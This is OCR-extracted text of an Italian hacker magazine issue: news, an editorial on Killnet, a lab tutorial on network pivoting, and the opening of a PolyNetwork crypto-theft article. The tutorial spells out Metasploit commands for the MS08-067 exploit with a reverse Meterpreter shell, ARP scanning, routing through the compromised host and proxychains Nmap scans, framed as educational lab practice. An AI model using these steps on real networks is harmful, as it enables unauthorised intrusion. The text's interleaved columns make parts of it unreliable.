SPIATI DALLO

giugno

SMARTPHONE
N.263

L’uso distorto di app legali al 100%

trasforma un telefonino in un gadget spia
www.hackerjournal.it

Dal 2002 tutto quello che gli altri non osano dirti

Ladri di

s
cryptovalute

ew
Ecco com’è andata una
delle più colossali sparizioni
di valuta digitale della storia
_n
A scuola di
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

virtualizzazione
lia

Impara a creare un laboratorio

per gli esperimenti
ita

con le macchine virtuali

B u c a l a r et e
un passo alla volta
@

Se un cybercriminale sfonda una delle macchine è la fine:

hackerati ecco come fa a conquistare l’accesso a tutta la LAN
da un
minorenne
Le big della tecnologia
sono cadute una a una
sotto i colpi di una
pentesting
Se non si usano password forti
monopattini sprint
C’è chi ha trovato il modo per
gang guidata da un e non le si cambiano spesso, un aggirare le nuove limitazioni
cracker sedicenne attacco a dizionario è dietro l’angolo imposte dai produttori di e-scooter
 IN EDICOLA
DAL 20 MAGGIO

s
ew
_n
lia
ita
@

Scansiona il QR Code

Acquistala su www.sprea.it/prog
versione digitale disponibile dal 17 maggio
 EDITORIALE
www.hackerjournal.it
In questo numero parliamo di:
Pivoting, Lapsus$, PolyNetwork,
macchine virtuali, codici seriali dei
monopattini, videosorveglianza con la
Raspberry Pi, NTFS, attacchi a dizionario,
Zed Attack Proxy e molto altro.

s
K
illnet: ecco il nome del nemico numero uno

ew
di questi tempi per le infrastrutture
pubbliche, e non solo, italiane (e in generale
di quelle dei Paesi NATO). Tra gli attacchi più
chiacchierati, forse, c’è quello annunciato all’Eurovision
_n
Song Contest che si è svolto a Torino. Killnet un
collettivo russo che sta bloccando numerosi siti con
attacchi DDoS e che dall’inizio dell’anno sembra
lia

cresciuto moltissimo. In qualche modo è la risposta pro

Russia alla grande mobilitazione messa in atto da
Anonymous. Tutti questi attacchi hanno provocato
dei disagi, soprattutto quelli attuati contro ospedali
ita

e strutture sanitarie, con blocchi dei Pronto Soccorso e

ritardi nelle visite. Tutto ciò dovrebbe far aprire gli occhi
ai nostri governanti che, per la verità, si sono accorti CONTATTI
@

del problema. Difatti, con la nuova Strategia nazionale

REDAZIONE
di cybersicurezza (2022-2026) approvata dal Comitato
redazione@hackerjournal.it
Interministeriale per la Cybersicurezza, alla lotta contro
ABBONAMENTI
gli attacchi cibernetici verrà destinato l’1,2% degli E ARRETRATI
abbonamenti@sprea.it
investimenti nazionali per il finanziamento di progetti www.sprea.it/digital
che garantiscano l’autonomia tecnologica in ambito
FACEBOOK
digitale e l’innalzamento dei livelli di cybersicurezza www.facebook.com/
hackerjournal/
dei sistemi informativi nazionali. Speriamo che questi
soldi vengano spesi bene, ce n’è davvero bisogno. SITO WEB
www.hackerjournal.it
 Il prossimo num ero sara
in edicola dal 5 luglio

SOMMARIO ABBONATI ALLA

VERSIONE DIGITALE
SOLO PER PC E MAC
A SOLI 19,90 €
DURATA ABBONAMENTO: 1 ANNO

s
www.hackerjournal.it/abbonamenti

ew
HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker................................................................ 06
_n
COVER STORY
Buca la rete un passo alla volta
Se un cybercriminale sfonda una delle macchine è la fine: ecco come
lia

fa a conquistare l’accesso a tutta la LAN....................................................................... 08

PolyNetwork | Furto colossale di cryptovalute

ita

Le blockchain si presentano come un sistema “sicuro” per memorizzare

informazioni, ma non dobbiamo dimenticare che il livello di sicurezza
reale dipende dalle implementazioni................................................................................ 16
@

NOI RISPETTIAMO L’AMBIENTE!

Hacker Journal è stato stampato
su carta certificata PEFC, proveniente
da piantumazioni a riforestazione programmata
e perciò gestite in maniera sostenibile

M IGL IORARE
A
P
I
RU
ETA
F
C
E I
R A
I TA!
A T UA R I V ISTA
L .ly/hackerjo
://bit
urnal
Vai su https questionario anonimo
e compila il
4
 Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”

ia
Gadget sp

s
SICUREZZA

ew
Spionaggio | Così ti spio dal cellulare
L’uso distorto di app al 100% legali trasforma lo smartphone in una spia...... 24
Pentesting | Attacco a dizionario!
Imparerete a portare avanti un dictionary attack contro Mutillidae........................... 32

> 24
Virtual Machine | Reti virtuali in azione
_n
Scoprite tutte le potenzialità della virtualizzazione.................................................. 40
lia

HOW TO 44
Serial hacking | Monopattini con il turbo
Hanno aggirato le nuove limitazioni imposte dai produttori di e-scooter................... 44
ita

Videosorveglianza | Registra con la motion detection

Un sistema di videosorveglianza ideale per la sicurezza...................................................... 48

Filesystem | Alla scoperta di NTFS, quarta parte

MONOPA
@

Chi ha detto che un file cancellato lo è “per sempre”?............................................................ 52 TTINI

> 58
HACKULTURE
Cybercrimine | Lapsus$ ha messo nel sacco le big tech
Sotto questo nick si nasconde un gruppo di hacker giovanissimi che ha
messo in piedi operazioni molto sofisticate contro i colossi della tecnologia....... 58

tt o ri , le risposte de lla redazione > 61

Le do m a n d e d e i le
POSTA
HACKTUALITÀ

NLETETURW
E
S Gli USA voglio
no

s
sange a tutt i i costi!
As

ew
#LIBERTÀ Il giornalista, attivista e programmatore australiano è
un po’ più vicino all’estradizione negli USA... ma la battaglia continua

D obbiamo purtroppo aggiungere una notizia decisamente negativa

_n
alla storia giudiziaria che sta vivendo Julian Assange, il fondatore
di WikiLeaks. Difatti un giudice britannico ha approvato formalmente
l’estradizione dell’hacker/giornalista australiano negli Stati Uniti, dove
verrà accusato di spionaggio a causa delle rivelazioni publicate sul sito
di WikiLeaks (https://wikileaks.org) e poi in diversi giornali sulle cattive
azioni degli americani in diversi conflitti (tra le altre cose).
lia

Il caso ora passerà al Ministro degli Interni britannico per una decisione
e, per fortuna, il fondatore di WikiLeaks ha ancora vie legali di ricorso da
perseguire. L’ordine, che avvicina l’estradizione, arriva dopo che il mese
DATA ANALYTICS
scorso la Corte Suprema del Regno Unito ha rifiutato ad Assange
PER TUTTI
il permesso di appellarsi contro la sentenza di un tribunale di grado
ita

I dati sono il petrolio del inferiore secondo cui poteva essere estradato.
ventunesimo secolo. L’avvocato di Assange, Mark Summers, ha detto alla corte che il team
La rivoluzione digitale legale aveva delle osservazioni serie da presentare. Gli Stati Uniti hanno
che viviamo da tempo si basa chiesto alle autorità britanniche di estradare Assange in modo che possa
su di essi e per affrontare il essere processato con 17 accuse di spionaggio e un’accusa di uso
futuro è necessario imparare improprio del computer.
@

a capirli, gestirli e trasformarli

in valore (o influenzare le
decisioni). Questo è il lavoro
dei “tecnici del dato”
e il volume in esame fornisce
le nozioni, le tecniche e le
informazioni su alcuni degli
strumenti da usare per
dominare dati e algoritmi
così da sfruttarli al meglio
per il proprio lavoro, anche
in ambito sicurezza.
Un libro adatto a manager,
professionisti e studenti.
https://bit.ly/hj263_dati

6
 NEWS
I pirati attaccano TWITTER
CRITTOGRAFATO
anche gli NFT END TO END
#FURTO Sono usciti alcuni CVE relativi a dispositivi #TWEET Elon Mask vuole rendere
più robusto il “suo” social

L’ account Instagram e il server Discord della

L
famosa collezione di NFT Bored Ape
e vicende azionarie di Twitter
Yacht Club (BAYC) sono stati violati, come
sono sulla bocca di tutti da un po’
hanno confermato i leader del progetto su
di tempo, da quando l’imprenditore
Twitter. Dei pirati hanno diffuso un falso
link ai follower con l’obiettivo Elon Mask ha annunciato l’acquisto di

s
di prosciugare i portafogli delle vittime tutto il pacchetto azionario del social.
e alcuni utenti sembrano essere A dir la verità, Mask sta un po’
caduti nella truffa. giocando con le parole facendo

ew
Un testo che accompagnava il crollare o volare il titolo in borsa,
collegamento ingannevole indicava agli utenti ma il fatto che ci interessa è che
di poter coniare una terra digitale su ora sta esercitando il suo potere
OthersideMeta, una piattaforma del Metaverso per apportare alcune modifiche
il cui lancio era previsto a breve. Alla fine della storia, si stima che rivoluzionarie alla piattaforma di
siano state rubate circa 24 scimmie annoiate e 30 scimmie mutanti,
microblogging. Il proprietario di Tesla
_n
secondo i dati di OpenSea. Il valore dei 54 NFT calcolato dal prezzo
vuole aggiungere E2EE (crittografia
minimo è di 13,7 milioni di dollari.
end-to-end alla funzione Direct
Messages (DM) di Twitter) perché
ritiene che sia importante adottare
E2EE come Signal per prevenire lo

TIM lancia
lia

spionaggio o l’hacking dei messaggi

degli utenti su Twitter.
Telsy,
antivirus
ita

tutto italiano
@

#ITALIA Finalmente una soluzione per la

protezione dei dati avanzata Made in Italy
balza alla ribalta dell’attenzione pubblica funzionalità tipiche dei sistemi moderni, integrando
e si prepara a sfidare i concorrenti cioè le funzioni di antivirus, antimalware, antispyware
e antiransomware.
TIM lancia sul mercato con Telsy, società del Gruppo La nuova soluzione, disponibile dal maggio scorso,
specializzata in cybersecurity e crittografia, un nuovo è il risultato del lavoro di esperti specializzati nella
sistema antivirus avanzato interamente ‘made in Italy’ cybersecurity, del Telsy Incident Response Team
e destinato alla clientela Business e alla Pubblica e della grande esperienza maturata negli anni
Amministrazione. dall’azienda del Gruppo nella realizzazione di prodotti
Progettato, sviluppato e gestito in Italia, il nuovo e servizi per la sicurezza delle informazioni e delle
sistema di Endpoint Protection garantisce le telecomunicazioni.

7
 HACKTUALITÀ la re te u n p asso alla vo lta
C O V E R S TO R Y:B u c a

GLOSSARIO
DI BASE
POST-EXPLOITATION

s
È riferibile a qualsiasi azione
che può essere intrapresa
dopo la riuscita di un exploit

ew
che permette di aprire
una shell nella macchina
compromessa oppure di avere
a disposizione Meterpreter.

PAYLOAD
Nel mondo del malware
_n
il payload descrive ciò
che un virus, worm o trojan,
è progettato per fare sul
computer target. Per esempio,
il payload potrebbe includere
corruzione dati, furto di
lia

informazioni riservate e danni

all’infrastruttura in generale.

MULTI-LEVEL PIVOTING
Pivoting reiterato su ulteriori
ita

segmenti di rete, ovvero

quando si tenta di ottenere
l’accesso a una nuova
sottorete legata a una
macchina che da una parte
offre un servizio e dall’altra ha

B u c a l a r et e
@

un collegamento ad altre
macchine in LAN o DMZ.

un passo alla volta

ic a at tr av er so la quale è possibile
Alla scoperta de ll a te cn
as tr ut tu ra di re te a partire da una breccia
tera infr
compromettere un’in

8
I
l pivoting è una tecnica di post-exploitation
attraverso la quale un attaccante sfrutta una
macchina compromessa come “perno”, ossia
come punto di partenza dal quale analizzare
un ulteriore livello di rete, scovare nuovi bersagli
e attaccare altre macchine in segmenti di reti non
raggiungibili direttamente. Generalmente questa
tecnica viene utilizzata per addentrarsi sempre più
nelle maglie di una rete con lo scopo di arrivare
a una macchina considerata il vero obiettivo. Ciò che
figura #2

s
rende possibile questa tecnica è principalmente un
computer all’interno di una rete che presenta un Rete “equivalente” realizzata con VirtualBox.
servizio esposto verso l’esterno, come un Web server

ew
con software non aggiornati e/o con configurazioni USIAMO LE VM
un po’ “leggere” dal punto di vista della sicurezza Per mettere i lettori nella condizione di eseguire
e che in qualche modo si riesce a compromettere; la prova occorre avvalersi della virtualizzazione
a questo punto diventerà la macchina pivot che creando un ugual numero di macchine virtuali da
permetterà di raggiungere nuovi segmenti di rete. configurare al fine di simulare la rete di [figura #1].
Con quattro sistemi virtuali (guest) e un sistema
_n
UN POSSIBILE SCENARIO host che lancia VirtualBox occorre un computer
In [figura #1] il computer con indirizzo 192.168.1.10 con almeno 8 GB di RAM, meglio se 16 GB. La
è l’attaccante, ovvero la macchina a partire dalla configurazione visibile in [figura #2] permette di
quale vogliamo effettuare un pentesting sul server avere un uso ridotto di risorse utilizzando Kali Linux
da compromettere, che presenta un dato indirizzo per la macchina attaccante, Windows XP SP3 come
lia

pubblico come 87.30.212.150. Il firewall presente macchina da compromettere, Tiny Core Linux
blocca tutto il traffico in entrata a eccezione delle (http://tinycorelinux.net/) e MX Linux (https://mxlinux.
porte dedicate ai servizi esposti pubblicamente org/) per le macchine della rete interna che si vuole
e permette il traffico in uscita senza restrizioni. scansionare. Si dà per scontato che si sappia come
La suddetta macchina presenta l’IP privato installare un sistema operativo in VirtualBox; nel
ita

192.168.10.2 al fine di poter comunicare con altri seguito si prenderà in considerazione solo la
sistemi nella LAN. L’interesse è una scansione della configurazione dei quattro sistemi operativi. Per
rete interna per capire se vi sono macchine con semplicità sono stati cambiati gli indirizzi IP e in
servizi vulnerabili al fine di poterne prendere il rosso si è evidenziata la macchina da “bucare”.
controllo e cercare di raggiungere, se esistente, La macchina sul segmento di rete 10.0.2.x non vedrà
@

un ulteriore livello interno. Vediamo come operare. la rete interna 10.1.1.x ma ci dovrà arrivare tramite
compromissione della macchina evidenziata in rosso
[figura #2], mentre le tre macchine sul segmento
di rete 10.1.1.x risulteranno raggiungibili tra di loro
così come riportato nel quarto passo del tutorial di

NOTA
Metasplolit è un framework sviluppato dalla società
Rapid7 (https://www.rapid7.com/) largamente
impiegato per la creazione e l’esecuzione di exploit
sfruttando le vulnerabilità presenti nei vari
figura #1 programmi installati nel sistema.
Schema minimale per la comprensione del pivoting.

9
HACKTUALITÀ la re te u n p asso alla vo lta
C O V E R S TO R Y:B u c a
figura #3

s
ew
Impostazione degli indirizzi statici in Microsoft Windows XP.

questa pagina. Notate che, poiché sul segmento di ipconfig all

rete 10.1.1.x non si ha alcun DHCP attivo, gli host
collegati non riceveranno alcun indirizzo di rete, il cui output ci dirà quale delle due schede di rete
_n
come invece accade per il segmento 10.0.2.x. virtuali ha ricevuto l’indirizzo dal DHCP virtuale.
Per i motivi elencati occorre procedere Dalla parte sinistra di [figura #3] è evidente come sia
all’assegnazione statica degli indirizzi. In Windows XP (LAN) mentre (LAN) 2 è la scheda alla quale si dovrà
è sufficiente andare in Start > Pannello di controllo assegnare l’indirizzo statico cliccando con il tasto
> Rete e connessioni Internet > Connessioni destro del mouse su di essa e optando per
lia

di rete per arrivare alle schede di rete, quindi aprite Proprietà. Dalla finestra a comparsa selezionate
un prompt dei comandi e lanciate Protocollo internet (TCP/IP), cliccate su Proprietà

LA CONFIGURAZIONE
ita

#1
#2
@

Avviate il gestore di macchine virtuali di VirtualBox e

da File scegliete Preferenze. Nella nuova finestra, da Si dà per scontato che le macchine virtuali siano già
Rete (a sinistra) cliccate sulla piccola icona posta sul installate. Nelle Impostazioni per Windows XP, nella
bordo destro recante un + e aggiungete una nuova sezione Rete, nel tab Scheda 1 in Connesso a: scegliete
rete con NAT. Prima di cliccare OK assicuratevi che la Rete con NAT assicurandovi che in Nome: sia selezionata
casella Attivo associata a NatNetwork sia spuntata. la rete NatNetwork.

10
 e nella nuova finestra selezionate Utilizza il virtuali Kali Linux e Windows XP. Eseguite
seguente indirizzo IP riportando 10.1.1.4 in la configurazione come riportato nel
Indirizzo IP e 255.255.255.0 in Subnet mask, [figura tutorial e, a seguire, dal menu di Kali avviate il Root
#3] a destra. Per le due distro Linux l’assegnazione di Terminal Emulator quindi eseguite il comando
indirizzi statici vede impartire in una shell i comandi
msfconsole
sudo ifconfig eth0 10.1.1.5 netmask
255.255.255.0 up e al prompt msf6> digitate

per la Tiny Core e use exploit/windows/smb/ms08_067_netapi

s
sudo ifconfig eth0 10.1.1.10 netmask seguito da Invio. Il comando options nell’output
vi ricorda che occorre impostare il payload con

ew
255.255.255.0 up

per MX Linux. set PAYLOAD windows/meterpreter/reverse_tcp

L’EXPLOIT SULLA MACCHINA quindi indicate la macchina target utilizzando

Per compromettere la macchina Windows è stata
utilizzata una vulnerabilità catalogata da Microsoft set RHOSTS 10.0.2.15
_n
con MS08_067 nota come Server Service
Vulnerability. Tale vulnerabilità permette ovvero l’IP di Windows XP. A questo punto il
l’esecuzione di codice remoto. Sebbene sia stata comando exploit seguito da Invio permetterà di
utilizzata su Windows XP SP3, è possibile sfruttarla avere una reverse shell facendo aprire una sessione
su altre versioni dell’OS di Microsoft. L’esecuzione di Meterpreter nel quale il comando sysinfo
lia

dell’exploit è piuttosto banale da portare a termine. confermerà [figura #4] la compromissione della
Concentratevi al momento sulle due macchine macchina che installa Windows XP!

DEI SISTEMI OPERATIVI

ita

#3 #4
@

Sempre nella macchina Windows XP spostatevi nel tab Le altre macchine come Tiny Core e MX Linux avranno
Scheda 2 e spuntate la casella Abilita scheda di rete. una sola scheda di rete connessa a intnet. In questo
Nel menu Connessa a: optate per Rete interna e in Nome modo, figura in alto, Kali vedrà solo Windows XP e
selezionate intnet. Per Kali Linux dovrete abilitare una sola quest’ultimo potrà pingare da una parte Kali e dall’altra
scheda di rete. In Connesso a: scegliete Rete con NAT scheda di rete le altre due macchine. Tiny Core e MX
e in Nome rete indicate NatNetwork. Linux si potranno pingare tra di loro e con Windows XP.

11
HACKTUALITÀ la re te u n p asso alla vo lta
C O V E R S TO R Y:B u c a
Macchina compromessa come evidenziato Risultato della scansione delle porte delle
dal comando sysinfo! macchine nella rete privata.
figura #4 figura #5

s
ew
PRO/1000 Gigabit #2
Hardware MAC : 08:00:27:40:50:e0
_n
MTU : 1500
CI SONO HOST? IPv4 Address : 10.1.1.4
I più attenti avranno pensato alla possibilità di avviare IPv4 Netmask : 255.255.255.0
una shell, impartendo l’omonimo comando
all’interno di Meterpreter, quindi navigare nel La presenza dell’indirizzo privato 10.1.1.4 potrebbe
lia

filesystem del sistema appena compromesso! E tutto fare nascere dei sospetti a riguardo, nello specifico
ciò è vero, ma c’è di più. Dalla stessa shell aperta con la presenza di una rete interna 10.1.1.x che
Meterpreter si può analizzare lo stato della rete con comunicherà probabilmente con altre macchine in
LAN o DMZ (Demilitarized zone). In particolare la
riga IPv4 Netmask 255.255.255.0 suggerisce che,
ita

netstat -na
almeno in linea teorica, è possibile effettuare una
che riporterà in output le connessioni attive nello scansione di eventuali host presenti nella sottorete
stato stabilita (ESTABLISHED) e in ascolto con indirizzi da 10.1.1.2 a 10.1.1.254. Ma dalla
(LISTENING). Per la rete interna in una situazione postazione Kali Linux non si ha un accesso diretto
reale non si è in genere a conoscenza di eventuali alla rete privata, pertanto dovrà essere creata una
@

host esistenti attorno alla macchina compromessa. rotta apposita. Prima di farlo, però, occorre verificare
Ma dalla sessione attiva di Meterpreter eseguendo la presenza di sistemi attivi su quel segmento di rete
ipconfig l’output può dare un qualcosa simile a: e ciò è possibile attraverso un arp scanning.
Nella medesima sessione Meterpreter impartite
Name : Scheda server Intel(R) dapprima il comando background, che sposterà

Una rete DMZ (demilitarizzata) si colloca tra la rete

Internet e la rete interna aziendale fornendo maggiore
sicurezza a quest’ultima poiché non espone i servizi
interni sulla grande rete ma lo fa attraverso una rete
privata dedicata protetta da firewall

12
Wireshark in esecuzione su Kali Linux. Wireshark in esecuzione su Windows XP.

figura #6 figura #7

s
in “secondo piano” la sessione corrente riportando
il sistema alla console di Metasploit.
A questo punto dovete eseguire il caricamento
ew
dove il risultato evidenzia la presenza di due
macchine raggiungibili dalla macchina
compromessa. Terminata la scansione, il comando
_n
dell’apposito modulo che permetterà l’esecuzione sessions -i 1 riporterà alla sessione di Meterpreter.
dell’arp scanning usando
QUALI SERVIZI SONO ATTIVI?
use post/windows/gather/arp_scanner Per verificare quali porte le macchine attive hanno
in ascolto sul segmento di rete raggiunto dovete
lia

Il comando options illustrerà le opzioni da istruire Metasploit a instradare il traffico destinato

impostare per il modulo arp_scanner, di preciso alla rete privata 10.1.1.0/24 attraverso la sessione
Meterpreter esistente tra Kali Linux (l’attaccante)
set SESSION 1 e la macchina compromessa. Per delineare la rotta e
instradare il traffico di richieste si mette, qualora non
ita

(il numero 1 è relativo alla session id che è stata lo fosse, dapprima l’attuale sessione in background
messa in background) quindi impostate il range (omonimo comando) quindi si traccia la rotta con
di indirizzi del target in notazione CIDR con
route add 10.1.1.0 255.255.255.0 1
@

set RHOSTS 10.1.1.0/24

dove l’ultimo 1 indica il session id di Meterpreter.
Ora il comando run seguito da Invio effettuerà Il comando route print illustrerà la routing table
l’arp scanning. La presenza di altre macchine verrà impostata che avrà come gateway session 1 di
riportata in output, e.g. qualcosa del tipo: Meterpreter. A questo punto è possibile eseguire
un TCP port scanner caricando l’apposito modulo:
[*] ARP Scanning 10.1.1.0/24
[+] IP: 10.1.1.4 MAC 08:00:27:40:50:e0 use auxiliary/scanner/portscan/tcp
(CADMUS COMPUTER SYSTEMS)
[+] IP: 10.1.1.5 MAC 08:00:27:9b:ea:90 e impostando gli opportuni valori dei parametri
(CADMUS COMPUTER SYSTEMS) visualizzabili con il comando options.
[+] IP: 10.1.1.10 MAC 08:00:27:38:c8:96 Nel caso in essere interessa analizzare le due
(CADMUS COMPUTER SYSTEMS) macchine con indirizzi 10.1.1.5 e 10.1.1.10 quindi
[*] Post module execution completed impostate i target con

13
HACKTUALITÀ la re te u n p asso alla vo lta
C O V E R S TO R Y:B u c a

set RHOSTS 10.1.1.5 10.1.1.10 ciò di cui si necessita con Kali Linux per
poi spostarlo sul filesystem di Windows XP
e lasciate gli altri parametri ai valori di default. Tutta da Meterpreter con il comando
la procedura riportata con annesso risultato è
visibile in [figura #5]. Come si può vedere sono stati upload /percorso/file.exe C:\\Programmi
trovati due indirizzi IP privati. Il risultato della
scansione mostra, per esempio, che la macchina In [figura #7] viene mostrato il packet sniffer
10.1.1.5 sembra non avere porte TCP aperte mentre Wireshark in esecuzione su Windows XP: si può
la macchina 10.1.1.10 ne presenta quattro: la 445 notare come sia la macchina compromessa a
(servizio smb/cifs), la porta 111 del servizio rpcbind inoltrare le richieste ai computer presenti nella rete

s
(man 8 rpcbind per approfondimenti) così come interna, ed è sempre la macchina compromessa
la 139 per Netbios. Aperta anche una criptica porta a comunicare i risultati a chi attacca (Kali Linux).
6566. Per scoprire a quale programma/servizio

ew
è associata potete usare, sulla macchina che lancia RICHIESTE CON PROXY
il servizio ovvero MX Linux, il comando Essere a conoscenza di porte esposte in rete è una
condizione necessaria ma non sufficiente per
netstat -ltnp | grep -w ‘:6566’ comprendere il tipo di servizio. Se si prende il
demone del programma SANE esso, una volta
che fornirà in uscita un qualcosa del tipo attivato, di default si mette “in ascolto” sulla porta
_n
6566, ma nessuno ci assicura che sia SANE e non
tcp6 0 0 :::6566 :::* LISTEN 2047/saned un altro programma al quale sia stata cambiata
la configurazione predefinita. Per esserne sicuri
Trattasi quindi di saned, cioè il demone di SANE occorre eseguire una scansione della macchina in
(Scanner Access Now Easy – http://www.sane- questione con il port scanner Nmap il quale, però,
lia

project.org/), con PID 2047 in ascolto sulla porta essendo fuori dal contesto di Metasploit, non può
6566, il programma che permette di accedere a essere utilizzato direttamente. Per superare
dispositivi scanner su localhost. Durante la fase di l’impasse occorre incanalare le richieste in
TCP port scanning è possibile effettuare un packet un’applicazione che possa fare da tramite tra la
sniffing eseguendo Wireshark su Kali e su richiesta di analisi di Nmap in Kali e la macchina
ita

Windows XP. Se non si ha l’accesso alla rete compromessa: per far questo potete usare un proxy
da Windows XP è sempre possibile scaricare server oppure il port forwarding. Di seguito verrà
illustrata la modalità con proxy server in quanto
figura #8 meno intuitiva e un po’ più difficile da trattare.
Occorre sapere che Metasploit fornisce il modulo
@

socks_proxy con funzione proxy server che può

inoltrare le richieste che gli giungono a una rete di
interesse. Supporta connessioni SOCKS (SOCKet
Secure) in versione 4a in grado di veicolare solo
traffico TCP e versione 5 in grado di veicolare anche
richieste UDP. Ora, poiché l’ultimo comando è stato
l’uso del tcp scanner si è ancora con Meterpreter in
background ovvero si è nella console msf6, quindi si
può utilizzare il modulo del proxy server (viceversa
se si è in Meterpreter andrebbe dapprima utilizzato
il comando background) con

Port scanning Nmap in azione per il tramite

di proxychains. use auxiliary/server/socks_proxy

14
 figura #9 10.1.1.10 usando Nmap su proxychains
impartendo in una shell il comando

proxychains nmap -sT -Pn 10.1.1.10

e il cui risultato visibile in [figura #8] mostra con OK

le porte accessibili/aperte. Ma si può fare di più, si
può tentare di stabilire lo stato delle porte indicate
con OK. Per questa funzione sono obbligatori i
permessi dell’amministratore pertanto, dopo aver

s
aperto un Root Terminal Emulator in Kali, con
L’homepage del progetto SANE, il demone scovato
riferimento alla porta 6566 potete impartire
nella macchina identificata durante il pivoting

ew
Al solito il comando options illustra tutte le opzioni proxychains nmap -sV -sS -Pn -p 6566
che il modulo accetta ma prima di procedere 10.1.1.10
vi facciamo notare come vi occorra uno strumento
in grado poi di inoltrare le richieste di un programma il cui output potrebbe dare, a seconda delle
al proxy server che state avviando, che faccia quindi condizioni, un qualcosa del tipo:
da tramite tra il programma e il proxy server. Per
_n
questa funzione vi avvarrete di proxychains, un PORT STATE SERVICE VERSION
programma che reindirizza le connessioni tramite 6566/tcp open sane-port
SOCKS 4a/5 o proxy HTTP e supporta solo TCP. In
sostanza proxychains da un lato riceverà le richieste a conferma che la porta 6566 è aperta e in ascolto
di Nmap e dall’altra le inoltra al proxy server che a c’è il demone saned. La colonna STATE in alcune
lia

sua volta le rigira alla rete corrispondente. Di default circostanze potrebbe riportare filtered a indicare
proxychains lavora sulla porta 9050 mentre le che Nmap non può determinare se la porta è aperta
impostazioni predefinite del proxy server vedono o meno perché il filtraggio dei pacchetti ne
SRVHOST 0.0.0.0 e SRVPORT 1080 che comportano impedisce il corretto scanning.
il lancio del proxy in localhost e in ascolto sulla porta
ita

1080. Per non agire sui file di configurazione di IL PROSSIMO PASSO

proxychains impostate la porta di ascolto del proxy Se la macchina host che fornisce le risorse hardware
sulla porta di proxychains con a VirtualBox sostiene il carico, nessuno vieta di
creare una nuova macchina virtuale con Windows
Server 2008 o Windows 8 equipaggiata con due
@

set SRVPORT 9050

schede di rete, una collegata sulla intnet e l’altra a
seguito da realizzare un’ulteriore rete interna. Ci si potrà porre
la sfida di raggiungere l’ulteriore livello interno da
set VERSION 4a Kali Linux sfruttando vulnerabilità come EternalBlue
realizzando così un pivoting multilivello. In ogni
Il comando run seguito da Invio avvierà il proxy caso, nel momento in cui sono noti nome e versione
server mentre dell’applicativo che fornisce quel dato servizio, sarà
possibile usare da una shell di Kali searchsploit
netstat -tpln il quale cercherà tutti gli exploit e shellcode inerenti
quella data versione dell’applicativo.
in una shell Kali verifica effettivamente l’avvio del Se esiste una vulnerabilità, sfruttandola sarà
proxy in stato di ascolto (LISTEN). Ora potete possibile aprire un’altra sessione di Meterpreter
scansionare la macchina target con indirizzo che ci porterà nel secondo livello di rete interna.

15
HACKTUALITÀ
A cura di
Luca Tringali

SA L E

s
O C O L O S
FURT
ew
I P T OVA L U T E
DI C R
_n
en ta no co m e un si st ema “sicuro” per
Le blockchain si pres no n do bbiamo dimenticare
rm az io ni , m a
memorizzare info di pe nd e da ll e im plementazioni
a re al e
che il livello di sicurezz
lia

L
a blockchain, nel grande pubblico, scomoda. È quello che è accaduto di recente a
è associata alle criptovalute. Ma chi PolyNetwork, un servizio che si proponeva di
ha una maggiore dimestichezza con rendere le blockchain più comode: i dettagli
ita

l’argomento sa che in realtà si tratta dell’attacco subito non sono ancora del tutto
di un meccanismo che può essere applicato chiari, ma possiamo intuire il quadro generale.
a molti campi, oltre a quello monetario e più
in generale bancario. Questo perché una BLOCKCHAIN E TRANSAZIONE
blockchain è un database distribuito, che invece Proviamo, innanzitutto, a capire di cosa
@

di essere utilizzato con un classico meccanismo si occupi PolyNetwork. E possiamo farlo

client/server viene implementato su una rete partendo da qualcosa che è probabilmente più
P2P, in cui ogni “nodo” è contemporaneamente noto: Ethereum. Anche in questo caso, molti
server e client. Questo, unito a un meccanismo conosceranno Ethereum perché la moneta a
di firme digitali, lo rende molto sicuro, perché esso connessa (ETH) è stabilmente la seconda
se tutti possiedono una copia in tempo reale per capitalizzazione dopo il Bitcoin (BTC).
del database nessun nodo può modificare
i contenuti senza che tutti gli altri siano Ricordiamo che attaccare
d’accordo. Come in tutte le applicazioni
informatiche, tuttavia, nulla è di per sé sicuro: server altrui è un reato,
dipende dall’implementazione. E, spesso, più si per cui facciamo esperimenti
cerca di rendere una cosa comoda, più si deve
rinunciare a un po’ di sicurezza. Perché la
solo sulle macchine che
sicurezza è solitamente una cosa abbastanza abbiamo tirato su noi

16
 POLYNETWORK
GLOSSARIO
DI BASE
In realtà, mentre Bitcoin è stato inventato
CHIAVE PRIVATA proprio per la moneta elettronica, Ethereum ha
uno scopo ben diverso e la moneta è soltanto
La chiave privata di un utente viene utilizzata per firmare un aspetto quasi secondario della piattaforma.
i messaggi inviati alla blockchain. Siccome è privata,
Ethereum è infatti una rete per smart contract.
in teoria solo l’utente proprietario ne è in possesso,
e quindi lo identifica in modo univoco. L’idea di base parte dalla logica con cui
funzionano le monete elettroniche: una moneta
CHIAVE PUBBLICA ha valore fintanto che qualcuno è disposto
a scambiarla. Quindi la moneta non ha bisogno
A una chiave privata è associata una chiave pubblica, di essere un oggetto fisico per esistere: esiste
tramite la quale tutti possono decifrare la firma dell’utente

s
in quanto transazione, nel momento in cui un
ed essere certi che sia stato lui a firmare (perché unico
a possedere la corrispondente chiave privata). utente decide di consegnare 1 BTC a un altro,
La si usa anche come “indirizzo” per riferirsi all’utente. il Bitcoin esiste. E con la blockchain, che è un

ew
database, si può tenere traccia delle varie
CONSENSO transazioni che, rimesse assieme, costituiscono
l’intera storia della moneta elettronica. E che
Una blockchain può essere modificata, è solo una
cos’è una transazione se non un contratto tra
sequenza di dati nella forma “chiave: valore”. Però,
siccome è distribuita su una rete P2P, almeno due persone? È una semplice dichiarazione
la maggioranza dei partecipanti deve essere d’accordo: congiunta, nella quale un utente dichiara di voler
_n
questa è la regola del consenso. consegnare il Bitcoin a un altro utente, il quale
non si oppone, e tutti gli altri membri della
MONETA ELETTRONICA
blockchain sono d’accordo. E ogni contratto è
Le monete elettroniche sono i token digitali emessi uno scambio: che si vogliano consegnare Bitcoin
dall’algoritmo: non sarebbe necessario generarli, la in cambio di automobili o Euro in cambio di un
lia

blockchain può funzionare anche senza questi token, ma taglio di capelli, un contratto è una semplice
servono come incentivo per convincere la gente a mettere a affermazione firmata nella quale si promette
